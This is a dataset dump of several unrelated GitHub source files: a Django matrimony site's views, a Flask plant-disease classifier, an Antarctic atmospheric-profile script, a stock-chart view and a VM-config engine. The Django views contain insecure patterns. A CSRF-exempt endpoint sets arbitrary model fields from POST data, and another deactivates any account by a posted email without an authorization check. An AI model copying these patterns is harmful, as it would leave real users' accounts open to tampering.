15\n\t\telse:\n\t\t\tmin_salary = 15\n\t\t\tmax_salary = 200000000\n\t\teducation = preference.education.split(',')[1:]\n\t\tcomplexion = preference.complexion.split(',')[1:]\n\t\tmarried = preference.married\n\t\tif profile.user.gender == 'M' :\n\t\t\tif key == 'rasi':\n\t\t\t\tget_profiles = Profile.objects.filter(\n\t\t\t\t\tuser__gender = 'F', \n\t\t\t\t\trasi = value, \n\t\t\t\t\tuser__is_active=True,\n\t\t\t\t\tuser__age__range = (min_age, max_age),\n\t\t\t\t\theight__range = (min_height, max_height),\n\t\t\t\t\tsalary__range = (min_salary, max_salary),\n\t\t\t\t\teducation__in = education,\n\t\t\t\t\tcomplexion__in = complexion,\n\t\t\t\t\tmarital_status = married,\n\t\t\t\t)\n\t\t\telse:\n\t\t\t\tget_profiles = Profile.objects.filter(\n\t\t\t\t\tuser__gender = 'F', \n\t\t\t\t\tnakshatra = value, \n\t\t\t\t\tuser__is_active=True,\n\t\t\t\t\tuser__age__range = (min_age, max_age),\n\t\t\t\t\theight__range = (min_height, max_height),\n\t\t\t\t\tsalary__range = (min_salary, max_salary),\n\t\t\t\t\teducation__in = education,\n\t\t\t\t\tcomplexion__in = complexion,\n\t\t\t\t\tmarital_status = married,\n\t\t\t\t)\n\t\t\tlatest_profiles = Profile.objects.filter(user__gender = 'F', user__is_active=True).order_by('-user__date_joined')[:3]\n\t\telse:\n\t\t\tif key == 'rasi':\n\t\t\t\tget_profiles = Profile.objects.filter(\n\t\t\t\t\tuser__gender = 'M', \n\t\t\t\t\trasi = value,\n\t\t\t\t\tuser__is_active=True,\n\t\t\t\t\tuser__age__range = (min_age, max_age),\n\t\t\t\t\theight__range = (min_height, max_height),\n\t\t\t\t\tsalary__range = (min_salary, max_salary),\n\t\t\t\t\teducation__in = education,\n\t\t\t\t\tcomplexion__in = complexion,\n\t\t\t\t\tmarital_status = married,\n\t\t\t\t)\n\t\t\telse:\n\t\t\t\tget_profiles = Profile.objects.filter(\n\t\t\t\t\tuser__gender = 'M', \n\t\t\t\t\tnakshatra = value, \n\t\t\t\t\tuser__is_active=True,\n\t\t\t\t\tuser__age__range = (min_age, max_age),\n\t\t\t\t\theight__range = (min_height, max_height),\n\t\t\t\t\tsalary__range = (min_salary, max_salary),\n\t\t\t\t\teducation__in = education,\n\t\t\t\t\tcomplexion__in = complexion,\n\t\t\t\t\tmarital_status = married,\n\t\t\t\t)\n\t\t\tlatest_profiles = Profile.objects.filter(user__gender = 'M', user__is_active=True).order_by('-user__date_joined')[:3]\n\telse:\n\t\tif profile.user.gender == 'M' :\n\t\t\tif key == 'rasi':\n\t\t\t\tget_profiles = Profile.objects.filter(user__gender = 'F', rasi = value, user__is_active=True)\n\t\t\telse:\n\t\t\t\tget_profiles = Profile.objects.filter(user__gender = 'F', nakshatra = value, user__is_active=True)\n\t\t\tlatest_profiles = Profile.objects.filter(user__gender = 'F', user__is_active=True).order_by('-user__date_joined')[:3]\n\t\telse:\n\t\t\tif key == 'rasi':\n\t\t\t\tget_profiles = Profile.objects.filter(user__gender = 'M', rasi = value)\n\t\t\telse:\n\t\t\t\tget_profiles = Profile.objects.filter(user__gender = 'M', nakshatra = value, user__is_active=True)\n\t\t\tlatest_profiles = Profile.objects.filter(user__gender = 'M', user__is_active=True).order_by('-user__date_joined')[:3]\n\t\tcomplexion = ''\n\t\teducation = ''\n\tpage = request.GET.get('page', 1)\n\tpaginator = Paginator(get_profiles, 10)\n\ttry:\n\t\tshow_profiles = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tshow_profiles = paginator.page(1)\n\texcept EmptyPage:\n\t\tshow_profiles = paginator.page(paginator.num_pages)\n\tcontext = {\n\t\t'profile' : profile,\n\t\t'profile_image' : profile_image,\n\t\t'show_profiles' : show_profiles,\n\t\t'latest_profiles' : latest_profiles,\n\t\t'preference' : preference,\n\t\t'education' : education,\n\t\t'complexion' : complexion\n\t}\n\treturn render(request, 'mainApp/sort_by.html', context )\n\ndef manage_profile(request):\n\tcontext = {}\n\tif request.POST:\n\t\tuser = Profile.objects.get(user__email = request.user)\n\t\ttry:\n\t\t\tprofile = ProfileImage.objects.get(profile = user)\n\t\t\tif bool(request.FILES.get('profile_image', False)) == True:\n\t\t\t\tprofile.file = request.FILES['profile_image']\n\t\t\t\tprofile.save()\n\t\texcept ProfileImage.DoesNotExist:\n\t\t\tprofile = ProfileImage.objects.create(profile=user, file=request.FILES['profile_image'])\n\t\t\tprofile.save()\n\t\tif bool(request.FILES.get('horoscope', False)) == True:\n\t\t\tuser.horoscope = request.FILES['horoscope']\n\t\t\tuser.save()\n\t\treturn redirect('manage_profile')\n\t\n\tprofile = Profile.objects.get(user=request.user)\n\ttry:\n\t\tprofile_image = ProfileImage.objects.get(profile=profile)\n\texcept ProfileImage.DoesNotExist:\n\t\tprofile_image = ''\n\tcontext = {\n\t\t'profile' : profile,\n\t\t'profile_image' : profile_image,\n\t}\n\treturn render(request, 'mainApp/manage_profile.html', context )\n\n\n@csrf_exempt\ndef ajax_profile_update(request):\n\taccount = ['name', 'dob', 'age',]\n\tresponse = \"\"\n\tif request.POST:\n\t\tdata = request.POST\n\t\tif data['field'] in account:\n\t\t\tobj = Account.objects.get(email = request.user.email)\n\t\t\tsetattr(obj, data['field'], data['new_data'])\n\t\t\ttry:\n\t\t\t\tobj.save()\n\t\t\t\tprint(\"done\")\n\t\t\t\tresponse = 'success'\n\t\t\texcept:\n\t\t\t\tresponse = 'error'\n\t\t\t\treturn HttpResponse(response)\n\t\telse:\n\t\t\tobj = Profile.objects.get(user = request.user)\n\t\t\tsetattr(obj, data['field'], data['new_data'])\n\t\t\ttry:\n\t\t\t\tobj.save()\n\t\t\t\tprint(\"done\")\n\t\t\t\tresponse = 'success'\n\t\t\texcept:\n\t\t\t\tresponse = 'error'\n\t\t\t\treturn HttpResponseNotFound(response)\n\n\t\treturn HttpResponse(response)\n@csrf_exempt\ndef ajax_profile_pic_update(request):\n\tif request.POST:\n\t\tprint(\"done bish\")\n\t\tuser = Profile.objects.get(user__email = request.user)\n\t\tprofile = ProfileImage.objects.get(profile = user)\n\t\tprofile.file = request.FILES['profile_image']\n\t\tprofile.save()\n\t\treturn redirect('manage_profile')#HttpResponse(response)\n\treturn redirect('manage_profile')\n\ndef deactivate_user(request):\n if request.POST:\n email = request.POST['user']\n reason = request.POST['reason']\n user = Account.objects.get(email=email)\n user.is_active = False\n user.reason = reason\n user.save()\n return redirect('home')\n\ndef view_profile(request, id):\n\tview_profile = Profile.objects.get(user__id = id)\n\ttry:\n\t\tview_profile_image = ProfileImage.objects.get(profile=view_profile)\n\texcept ProfileImage.DoesNotExist:\n\t\tview_profile_image = ''\n\ttry:\n\t\tprofile_image = ProfileImage.objects.get(profile__user=request.user)\n\texcept ProfileImage.DoesNotExist:\n\t\tprofile_image = ''\n\tcontext = {\n\t\t'view_profile' : view_profile,\n\t\t'view_profile_image' : view_profile_image,\n\t\t'profile_image' : profile_image,\n\n\t}\n\treturn render(request, 'mainApp/view_profile.html', context)\n\ndef change_password(request):\n\tsystem_messages = messages.get_messages(request)\n\tfor message in system_messages:\n\t\tpass\n\tsystem_messages.used = True\n\tview_profile = Profile.objects.get(user=request.user)\n\ttry:\n\t\tprofile_image = ProfileImage.objects.get(profile=view_profile)\n\texcept ProfileImage.DoesNotExist:\n\t\tprofile_image = ''\n\tcontext = {}\n\tif request.method == 'POST':\n\t\tform = PasswordChangeForm(request.user, request.POST)\n\t\tif request.POST['old_password'] == request.POST['new_password1']:\n\t\t\tmessages.error(request, 'Old password and new password cannot be same', extra_tags=\"notification is-danger\")\n\t\telif form.is_valid():\n\t\t\tuser = form.save()\n\t\t\tupdate_session_auth_hash(request, user) # Important!\n\t\t\tmessages.success(request, 'Your password was successfully updated!', extra_tags=\"notification is-success\")\n\t\t\tcontext = {\n\t\t\t\t'form' : form,\n\t\t\t\t'profile_image' : profile_image,\n\t\t\t}\n\t\t\treturn render(request, 'mainApp/change_password.html', context)\n\t\telse:\n\t\t\tmessages.error(request, 'Please correct the error below.', extra_tags=\"notification is-danger\")\n\telse:\n\t\tform = PasswordChangeForm(request.user)\n\tcontext = {\n\t\t'form' : form,\n\t\t'profile_image' : profile_image,\n\t}\n\treturn render(request, 'mainApp/change_password.html', context)\n\ndef update_preference(request):\n\tprofile = Profile.objects.get(user = request.user)\n\tif request.POST:\n\t\ttry:\n\t\t\tpreference = Preference.objects.get(profile=profile)\n\t\t\tprint(\n\t\t\t\tpreference.age,\n\t\t\t\tpreference.height,\n\t\t\t\tpreference.salary,\n\t\t\t\tpreference.education,\n\t\t\t\tpreference.complexion,\n\t\t\t\tpreference.married\n\t\t\t)\n\t\texcept Preference.DoesNotExist:\n\t\t\tpreference = False\n\t\tif preference:\n\t\t\tpreference.age = request.POST['age']\n\t\t\tpreference.height = request.POST['height']\n\t\t\tpreference.salary = request.POST['salary']\n\t\t\tpreference.education = request.POST['education']\n\t\t\tpreference.complexion = request.POST['complexion']\n\t\t\tpreference.married = request.POST['married']\n\t\t\tpreference.save()\n\t\telse:\n\t\t\tpreference = Preference.objects.create(\n\t\t\t\tprofile=profile,\n\t\t\t\tage=request.POST['age'],\n\t\t\t\theight=request.POST['height'],\n\t\t\t\tsalary=request.POST['salary'],\n\t\t\t\teducation=request.POST['education'],\n\t\t\t\tcomplexion=request.POST['complexion'],\n\t\t\t\tmarried=request.POST['married'],\n\t\t\t)\n\t\t\tpreference.save()\n\t\treturn HttpResponse('success')\n\telif request.method == 'GET' :\n\t\tpreference = Preference.objects.get(profile=profile)\n\t\tpreference.delete()\n\t\treturn HttpResponse('Success')\n\n","repo_name":"jayantamadhav/tamilnaduyadava","sub_path":"mainApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32862185040","text":"from flask import Flask, render_template, request\r\nimport keras\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport json\r\n\r\napp= Flask(__name__)\r\n\r\n@app.route(\"/\", methods= [\"GET\",\"POST\"])\r\ndef hello():\r\n final_model2 = keras.models.load_model('D:/FinalYearProject/CLD Prediction WebApp/Model/Cassava_best_modelEffNetB3v3.h5')\r\n predictions = []\r\n IMG_SIZE = 380\r\n IMG_SIZE1 = 300\r\n # size = (IMG_SIZE,IMG_SIZE)\r\n size1= (IMG_SIZE1,IMG_SIZE1)\r\n #for image in test_images:\r\n if request.method == \"POST\":\r\n file = request.files['file']\r\n path = file.filename\r\n img1 = Image.open('C:/Users/arulk/OneDrive/Desktop/TestImages/' + path)\r\n img1 = img1.resize(size1)\r\n img1 = np.expand_dims(img1, axis=0)\r\n prediction2 = final_model2.predict(img1)\r\n predictions.extend(prediction2.argmax(axis = 1))\r\n f = open(\"D:/FinalYearProject/CassavaLeafDisase/cassava-leaf-disease-classification-source/label_num_to_disease_map.json\")\r\n data = json.load(f)\r\n val = data[\"{}\".format(predictions[0])]\r\n location = 'D:/FinalYearProject/CassavaLeafDisase/cassava-leaf-disease-classification-source/train_images/' + path\r\n return render_template(\"result.html\", msg=val ,imgg=location)\r\n return render_template(\"home.html\")\r\n\r\n@app.route('/')\r\ndef html_page(page_name):\r\n return render_template(page_name)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"Ragul-Arulanandam/CLDWebapp","sub_path":"CLD-PredictionWebApp/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28016020849","text":"import datetime as dt\nimport bisect\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom os.path import exists\n\n# import copy\n\n\n# My modules\nfrom antarc.get_atm_profs_rsrc import get_files, FileInfo, Sonde, Era, Prof\nfrom antarc.get_atm_profs_rsrc import get_co2, CO2stationData, CarbonTracker\n\n\ndef get_atm_profs(atm_prof_params, esc_params, esc_case, redo: bool = True):\n \"\"\"\n Get atmospheric profiles from sonde data, as well as ERA5, carbon tracker\n and surface co2 measurements, using imported parameters\n \"\"\"\n start_date = esc_case.DATE1\n end_date = esc_case.DATE2\n\n lat = esc_params.LATITUDE\n lon = esc_params.LONGITUDE\n # alt_surf = esc_params.ALTITUDE\n # location = esc_params.LOCATION\n layerbnds_in = atm_prof_params.LAYERBNDS\n model_extra = atm_prof_params.MODEL_EXTRA\n sonde_dir = atm_prof_params.SONDE_DIR\n sonde_filefmt = atm_prof_params.SONDE_FILEFORMAT\n era_dir = atm_prof_params.ERA_DIR\n era_fileformat = atm_prof_params.ERA_FILEFORMAT\n co2_dir = atm_prof_params.CO2_DIR\n co2_file_drake = atm_prof_params.CO2_FILE_PALMER\n co2_file_palmer = atm_prof_params.CO2_FILE_DRAKE\n ct_filefmt = atm_prof_params.CT_FILEFORMAT\n out_dir = atm_prof_params.OUT_DIR\n fig_dir = atm_prof_params.FIG_DIR\n\n # Flags. The created profiles are always saved. These flags set whether to\n # also plot and save figures and pickled results.\n plotfigs = True # Flag specifiying whether to plot and save figures\n\n # # # # # # # START MAIN CODE # # # # # # #\n\n # Pad out dates by a few days\n start_date = dt.datetime(\n start_date.year,\n start_date.month,\n start_date.day - 2,\n tzinfo=dt.timezone.utc,\n )\n end_date = dt.datetime(\n end_date.year,\n end_date.month,\n end_date.day + 1,\n tzinfo=dt.timezone.utc,\n )\n\n # Get filenames\n sonde_file_n_dates = get_files(sonde_dir, sonde_filefmt)\n eraFiles = FileInfo(era_dir, era_fileformat)\n\n ctFiles = FileInfo(co2_dir, ct_filefmt) # , 23, 33, \"%Y-%m-%d\")\n # surfmetFiles = FileInfo(surfmet_dir, surfmet_file, 12, 20, '%Y%m%d')\n\n # Get CO2 concentrations at stations\n co2_drake = CO2stationData(co2_file_drake)\n co2_palmer = CO2stationData(co2_file_palmer)\n\n # Chop dates down to desired range\n start_ord = dt.datetime.toordinal(start_date)\n end_ord = dt.datetime.toordinal(end_date)\n ndates = len(sonde_file_n_dates)\n ords = [\n dt.datetime.toordinal(sonde_file_n_dates[i][1]) for i in range(ndates)\n ]\n\n # QC date range of sondes\n if start_ord < ords[0] or end_ord > ords[-1]:\n raise ValueError(\"sondes missing for the desired date range\")\n\n # Get indices for date range\n ibeg = max(bisect.bisect_right(ords, start_ord) - 1, 0)\n iend = bisect.bisect_left(ords, end_ord) # ords.index(end_ord)\n\n # Loop over radiosounding files, set profile, and save as netcdf file\n for sonde_file, sonde_date in sonde_file_n_dates[ibeg : iend + 1]:\n # If the file exists, do not recreate it unless redo set to False\n if not redo and exists(sonde_dir + sonde_file):\n continue\n\n print(\"Working on\", sonde_file)\n sonde = Sonde(sonde_dir, sonde_file, sonde_date)\n sonde.quality_control()\n\n # Use the lowest sonde height as the surface height\n layerbnds = np.array(layerbnds_in)\n layerbnds[layerbnds < 1] += sonde.z[0] # km\n\n # If the CT data ends a while before the desired date, try one year before\n date_for_ct = sonde_date\n lastdate = ctFiles.dates[-1]\n if date_for_ct < ctFiles.dates[0]:\n raise ValueError(\"No useable CarbonTracker data found.\")\n\n while date_for_ct > lastdate and (date_for_ct - lastdate).days > 30:\n if date_for_ct < ctFiles.dates[0]:\n raise ValueError(\"No useable CarbonTracker data found.\")\n date_for_ct = dt.datetime(\n date_for_ct.year - 1,\n date_for_ct.month,\n date_for_ct.day,\n date_for_ct.hour,\n )\n # Get the nearest date\n # ddate = [x - date_for_ct for x in ctFiles.dates]\n # idate = np.argmin(np.abs(ddate))\n\n ctracker = CarbonTracker(ctFiles, date_for_ct, lat, lon)\n co2_surf = get_co2(sonde.date, lat, co2_drake, co2_palmer)\n\n era = Era(eraFiles, era_fileformat, sonde.date, lat, lon)\n era.tack_on_60km(ctracker) # Set values at 60 km, for interping\n\n prof = Prof(sonde, layerbnds) # P, T, RH from sonde\n prof.set_n_scale(\"co2\", ctracker, co2_surf) # CO2 from flask measmnts\n prof.set(\"o3\", era) # Ozone from ERA\n prof.set_upper(\"T\", era) # Upper T from ERA\n prof.set_upper(\"T\", ctracker) # Upmost T from carbonTracker\n prof.set_upper_spline(\"P\", era) # Upper P from ERA-Interim\n prof.h2o[prof.z >= 11.5] = 4.0 # Upmost H2o = 4 ppm\n # if plotfigs:\n # profo = copy.deepcopy(prof) # For plotting figures\n # prof.set_surf_T(surfmetFiles, sonde.date) # Set surface temperatures\n prof.model_extra = model_extra # model for other molecs\n\n prof.error_check(era) # Check for Nans, z, P\n\n # Save the output as netcdf file\n fname = out_dir + \"prof\" + prof.date.strftime(\"%Y%m%d_%H%m\")\n prof.write_to_netcdf_file(fname + \".nc\")\n\n # If specified, plot the results\n if plotfigs:\n # zmet, Tmet = get_surface_T(surfmetFiles, sonde.date)\n\n # .. Make figures showing results\n ylim = [-5, 65]\n\n plt.figure(0)\n plt.clf()\n plt.subplot(221)\n plt.cla()\n plt.plot(era.T, era.z, \".-\", label=\"ERA\")\n # plt.plot(ctracker.T, ctracker.z, \"o-\", label=\"Carbon Tracker\")\n plt.plot(\n sonde.T,\n sonde.z,\n linewidth=4,\n color=[0.6, 0.6, 0.6],\n label=\"sonde\",\n )\n plt.plot(prof.T, prof.z, \"k.-\", label=\"Profile\")\n # plt.plot(profo.T, profo.z, 'k.-', label = 'Profile before srf T')\n # plt.plot(Tmet, zmet, 'g*' )\n # plt.legend();\n plt.ylim(ylim)\n plt.ylabel(\"Temperature (K)\")\n plt.title(sonde_date)\n\n plt.subplot(222)\n plt.cla()\n plt.plot(era.P, era.z, \".-\", label=\"ERA\")\n # plt.plot(ctracker.P, ctracker.zbnd, \"o-\", label=\"Carbon Tracker\")\n plt.plot(\n sonde.P,\n sonde.z,\n linewidth=4,\n color=[0.6, 0.6, 0.6],\n label=\"sonde\",\n )\n plt.plot(prof.P, prof.z, \"k\", label=\"Profile\")\n plt.legend()\n plt.ylim(ylim)\n plt.ylabel(\"Pressure (mb)\")\n\n plt.subplot(223)\n plt.cla()\n plt.plot(era.rh, era.z, \".-\", label=\"ERA\")\n plt.plot(\n sonde.rh,\n sonde.z,\n linewidth=4,\n color=[0.6, 0.6, 0.6],\n label=\"sonde\",\n )\n plt.plot(prof.rh, prof.z, \"k\", label=\"Profile\")\n plt.legend()\n plt.ylim(ylim)\n plt.ylabel(\"Relative Humidity (%)\")\n\n plt.subplot(224)\n plt.cla()\n # plt.plot(ctracker.co2, ctracker.z, \".-\", label=\"Carbon Tracker\")\n plt.plot(prof.co2, prof.z, \"k\", label=\"Profile\")\n plt.legend()\n plt.ylim(ylim)\n plt.ylabel(\"CO2 (ppm)\")\n\n figname = \"prof\" + prof.date.strftime(\"%Y%m%d_%H%m\") + \".png\"\n plt.pause(0.1)\n plt.savefig(fig_dir + figname)\n\n plt.figure(1)\n plt.clf()\n plt.plot(np.diff(prof.T), prof.z[:-1] + np.diff(prof.z) / 2, \".-\")\n plt.title(sonde_date)\n plt.xlabel(\"$\\Delta$Temperature (K)\")\n\n figname = \"dT\" + prof.date.strftime(\"%Y%m%d_%H%m\") + \".png\"\n plt.pause(0.1)\n plt.savefig(fig_dir + figname)\n\n plt.figure(2)\n plt.clf()\n plt.plot(era.T, era.z, \".-\", label=\"ERA\")\n # plt.plot(ctracker.T, ctracker.z, \"o-\", label=\"Carbon Tracker\")\n plt.plot(\n sonde.T,\n sonde.z,\n linewidth=4,\n color=[0.6, 0.6, 0.6],\n label=\"sonde\",\n )\n # plt.plot(profo.T, profo.z, '-', label = 'Profile before surf T')\n plt.plot(prof.T, prof.z, \"k.-\", label=\"Profile\")\n # plt.plot(Tmet, zmet, 'g*', label = 'Surface data')\n plt.legend()\n plt.ylim(ylim)\n plt.xlabel(\"Temperature (K)\")\n maxT = np.max(\n [np.max(era.T[era.z < 1.4]), np.max(sonde.T[sonde.z < 1.4])]\n )\n xmin = np.floor(np.min(prof.T[prof.z < 1.4] - 2))\n plt.axis([xmin, np.ceil(maxT) + 2, -0.2, 1.4])\n\n figname = \"Tlow\" + prof.date.strftime(\"%Y%m%d_%H%m\") + \".png\"\n plt.pause(1)\n plt.savefig(fig_dir + figname)\n","repo_name":"prowe12/antarctic-peninsula","sub_path":"antarc/escudero/case202205/get_atm_profs.py","file_name":"get_atm_profs.py","file_ext":"py","file_size_in_byte":9123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17661355499","text":"from django.shortcuts import render\nimport yfinance as yf\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nfrom io import BytesIO\nimport base64\nfrom stockapp import utils\n\ndef index(request):\n plot_url = None\n if request.method == 'POST':\n symbol = request.POST.get('symbol')\n start_date,start_date_num = utils.getSpecificDate(num_days_ago=366)\n end_date,end_date_num = utils.getSpecificDate(num_days_ago=1)\n stock_data = yf.download(symbol, start=start_date, end=end_date)\n # Define the date format\n date_fmt = '%Y-%m-%d' # e.g., 2023-09-22\n date_formatter = mdates.DateFormatter(date_fmt)\n # Get current axis and set the formatter\n plt.figure(figsize=(10,5))\n plt.xlim(start_date_num,end_date_num)\n plt.xticks(rotation=45)\n ax = plt.gca()\n ax.xaxis.set_major_formatter(date_formatter)\n ax.xaxis.set_major_locator(mdates.MonthLocator()) \n plt.plot(stock_data['Close'], label='Close Price')\n xtick_locs = ax.get_xticks()\n ymin,ymax = ax.get_ylim()\n plt.vlines(x=xtick_locs,ymin=ymin,ymax=ymax, color='#D3D3D3', linestyles='dashed', alpha=0.5)\n plt.title(f'{symbol} Close Price')\n plt.xlabel('Date')\n plt.ylabel('Close Price (USD)')\n plt.legend(loc='upper left')\n plt.tight_layout()\n\n img = BytesIO()\n plt.savefig(img, format='png')\n img.seek(0)\n plot_url = base64.b64encode(img.getvalue()).decode()\n\n return render(request, 'stockapp/index.html', {'plot_url': plot_url})\n","repo_name":"jaycherd/Stock","sub_path":"stockapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11673146434","text":"import sys\nsys.path.append(\"/usr/lib/python2.6/site-packages\")\nimport hashlib\nimport time\nfrom cloudbot.interface.ttypes import *\nfrom cloudbot.utils import utility\nimport vmConfigEngine\nimport copy\nimport vmEngineUtility\n\nlogger = utility.init_log()\n\n\n# change the image ,update the clc global clientData \n#p_change_image_update_client_data\ndef p_update_clientdata_by_image(newImage,clientDataList):\n for userName in clientDataList.keys():\n if clientDataList[userName].has_key('remote'):\n clientDatas = clientDataList[userName]['remote']\n for clientData in clientDatas:\n if clientData.image_id == newImage.imageId:\n clientData.os_type = newImage.OS\n clientData.platform = newImage.platform\n clientData.image_category = newImage.imageCategory\n clientData.image_name = newImage.name \n \n if clientDataList[userName].has_key('local'):\n for nodeIp in clientDataList[userName]['local'].keys():\n clientDatas = clientDataList[userName]['local'][nodeIp]\n for clientData in clientDatas:\n if clientData.image_id == newImage.imageId:\n clientData.os_type = newImage.OS\n clientData.platform = newImage.platform\n clientData.image_category = newImage.imageCategory\n clientData.image_name = newImage.name \n return\n\n# change the image ,update the clc global instance info\n#old p_change_image_update_instances\ndef p_update_instances_by_image(newImage,instanceList):\n for cluster in instanceList.keys():\n for nodeIp in instanceList[cluster].keys():\n clientDatas = instanceList[cluster][nodeIp]\n for clientData in clientDatas:\n if clientData.image_id == newImage.imageId:\n clientData.os_type = newImage.OS\n clientData.platform = newImage.platform\n clientData.image_category = newImage.imageCategory\n clientData.image_name = newImage.name\n \n return\n\n# add vmconfig ,update the clc global clientData info and global instance info \ndef add_vmconfig(vmconfig,images,users,nodeList,clientDataList): \n for userInfo in users:\n # get user lmage list\n for img in images:\n clientInfo = thd_client_info()\n clientInfo.image_id = img.imageId\n clientInfo.image_name = img.name\n clientInfo.user = userInfo.userName\n clientInfo.vmconfig_id = vmconfig.id\n clientInfo.client_data_id = vmEngineUtility.create_clientdata_id(userInfo.userName,img.imageId)\n clientInfo.is_assign_node = vmconfig.is_assign_node\n if vmconfig.is_assign_node:\n clientInfo.node_ip = vmconfig.node_ip\n else:\n clientInfo.node_ip = 'any'\n if vmconfig.thermophoresis!=None: \n clientInfo.thermophoresis=copy.deepcopy(vmconfig.thermophoresis)\n if vmconfig.net_info!=None: \n clientInfo.net_info = copy.deepcopy(vmconfig.net_info)\n if vmconfig.run_schedule!=None:\n clientInfo.run_schedule = copy.deepcopy(vmconfig.run_schedule)\n if vmconfig.vm_info!=None:\n clientInfo.vm_info = copy.deepcopy(vmconfig.vm_info)\n if not vmconfig.is_assign_node:\n clientInfo.vm_info.is_run_without_copy = True\n if vmconfig.vm_info.machine_name==None:\n clientInfo.vm_info.machine_name = img.name\n if vmconfig.snapshot!=None:\n clientInfo.snapshot = copy.deepcopy(vmconfig.snapshot)\n if vmconfig.peripheral!=None:\n clientInfo.peripheral = copy.deepcopy(vmconfig.peripheral)\n instanceState= thd_instance_state()\n instanceState.instance_type= img.imageType\n instanceState.is_can_run = True\n instanceState.download_progress = -1\n instanceState.state = thd_TRANSACT_STATE.TERMINATED\n instanceState.is_local = False\n if vmconfig.is_assign_node:\n nodeInfo = vmEngineUtility.get_nodeinfo(vmconfig.node_ip,nodeList)\n if nodeInfo!=None and nodeInfo.isLocal!=None and nodeInfo.isLocal: \n instanceState.is_local = True \n clientInfo.instance_state = instanceState\n clientInfo.os_type = img.OS\n clientInfo.platform = img.platform\n clientInfo.image_category = img.imageCategory\n clientInfo.image_size = img.size\n clientInfo.user_department_id = vmconfig.user_department_id\n logger.debug('the clientInfo: %s' %str(clientInfo))\n vmEngineUtility.add_clientinfo_to_dictionary(clientInfo,clientDataList)\n \n logger.debug('init_client_info :%s' %str(clientDataList))\n return\n\n#old: p_update_clientinfo_from_vmconfig\ndef p_update_clientinfo_by_vmconfig(clientInfo,newVmConfig): \n clientInfo.is_assign_node = newVmConfig.is_assign_node\n if newVmConfig.is_assign_node:\n clientInfo.node_ip = newVmConfig.node_ip\n else:\n clientInfo.node_ip = 'any'\n if newVmConfig.thermophoresis!=None:\n clientInfo.thermophoresis=copy.deepcopy(newVmConfig.thermophoresis)\n if newVmConfig.net_info!=None:\n clientInfo.net_info = copy.deepcopy(newVmConfig.net_info) \n if newVmConfig.run_schedule!=None:\n clientInfo.run_schedule = copy.deepcopy(newVmConfig.run_schedule) \n if newVmConfig.vm_info!=None:\n vmInfo = copy.deepcopy(newVmConfig.vm_info)\n if newVmConfig.vm_info.machine_name==None: \n vmInfo.machine_name = clientInfo.vm_info.name\n if not newVmConfig.is_assign_node:\n vmInfo.is_run_without_copy = True\n clientInfo.vm_info = vmInfo\n if newVmConfig.snapshot!=None:\n clientInfo.snapshot = copy.deepcopy(newVmConfig.snapshot) \n if newVmConfig.peripheral!=None:\n clientInfo.peripheral = copy.deepcopy(newVmConfig.peripheral) \n return\n\n# add the image ,update the clc global clientData info and global instance info\ndef add_image(newImage,clientDataList):\n return\n\n# change the image ,update the clc global clientData info and global instance info\ndef change_image(newImage,clientDataList,instanceList):\n p_update_clientdata_by_image(newImage,clientDataList)\n p_update_instances_by_image(newImage,instanceList)\n \ndef delete_image(imageId,clientDataList):\n for userName in clientDataList.keys(): \n # delete remote node clientdata about image\n if clientDataList[userName].has_key('remote'):\n clientInfoList = clientDataList[userName]['remote'][:]\n for clientInfo in clientInfoList:\n if clientInfo.image_id==imageId:\n if not vmConfigEngine.g_user_thread_lock.has_key(userName):\n vmConfigEngine.g_user_thread_lock[userName]=threading.Lock() \n vmConfigEngine.g_user_thread_lock[userName].acquire()\n clientDataList[userName]['remote'].remove(clientInfo)\n vmConfigEngine.g_user_thread_lock[userName].release()\n #delete local node clientdata about image \n if clientDataList[userName].has_key('local'):\n clientDataLocalList = clientDataList[userName]['local']\n for nodeIp in clientDataLocalList.keys():\n clientInfoList = clientDataLocalList[nodeIp][:]\n for clientInfo in clientInfoList:\n if clientInfo.image_id==imageId:\n if not vmConfigEngine.g_user_thread_lock.has_key(userName):\n vmConfigEngine.g_user_thread_lock[userName]=threading.Lock()\n vmConfigEngine.g_user_thread_lock[userName].acquire()\n clientDataList[userName]['local'][nodeIp].remove(clientInfo)\n vmConfigEngine.g_user_thread_lock[userName].release() \n return \n \n# change vmconfig ,update the clc global clientData info and global instance info\ndef change_vmconfig(newVmConfig,images,nodeList,users,clientDataList):\n for userInfo in users:\n if clientDataList.has_key(userInfo.userName):\n #vmconfig assigned node is local node\n if clientDataList[userInfo.userName].has_key('local'):\n for nodeIp in clientDataList[userInfo.userName]['local'].keys():\n clientInfoList = clientDataList[userInfo.userName]['local'][nodeIp]\n for clientInfo in clientInfoList:\n if clientInfo.vmconfig_id==newVmConfig.id:\n vmConfigEngine.g_user_thread_lock[userInfo.userName].acquire()\n clientDataList[userInfo.userName]['local'][nodeIp].remove(clientInfo)\n vmConfigEngine.g_user_thread_lock[userInfo.userName].release() \n #vmconfig assigned node is remote node\n if clientDataList[userInfo.userName].has_key('remote'):\n clientInfoList = clientDataList[userInfo.userName]['remote']\n for clientInfo in clientInfoList:\n if clientInfo.vmconfig_id==newVmConfig.id:\n vmConfigEngine.g_user_thread_lock[userInfo.userName].acquire()\n clientDataList[userInfo.userName]['remote'].remove(clientInfo)\n vmConfigEngine.g_user_thread_lock[userInfo.userName].release()\n \n add_vmconfig(newVmConfig,images,users,nodeList,clientDataList)\n return \n \ndef delete_vmconfig(vmconfigId,clientDataList):\n return\n\n\ndef add_user(user,vmconfig,clientDataList):\n \n return\n\ndef delete_user(user,clientDataList):\n if clientDataList.has_key(user):\n if not vmConfigEngine.g_user_thread_lock.has_key(user):\n vmConfigEngine.g_user_thread_lock[user]=threading.Lock()\n vmConfigEngine.g_user_thread_lock[user].acquire()\n 